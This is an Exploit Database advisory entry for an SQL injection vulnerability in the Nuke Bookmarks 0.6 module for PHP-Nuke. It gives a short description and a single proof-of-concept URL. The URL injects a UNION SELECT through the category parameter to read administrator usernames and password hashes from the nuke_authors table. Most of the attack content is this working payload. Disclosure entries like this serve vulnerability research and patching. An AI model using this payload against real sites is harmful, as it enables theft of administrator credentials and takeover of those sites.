Nuke Bookmarks 0.6 Marks.php SQL Injection Vulnerability

2005-03-26T00:00:00
ID EDB-ID:25284
Type exploitdb
Reporter Gerardo Astharot Di Giacomo
Modified 2005-03-26T00:00:00

Description

Nuke Bookmarks 0.6 Marks.php SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/12908/info

Nuke Bookmarks is prone to an SQL injection vulnerability.

This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. 

http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors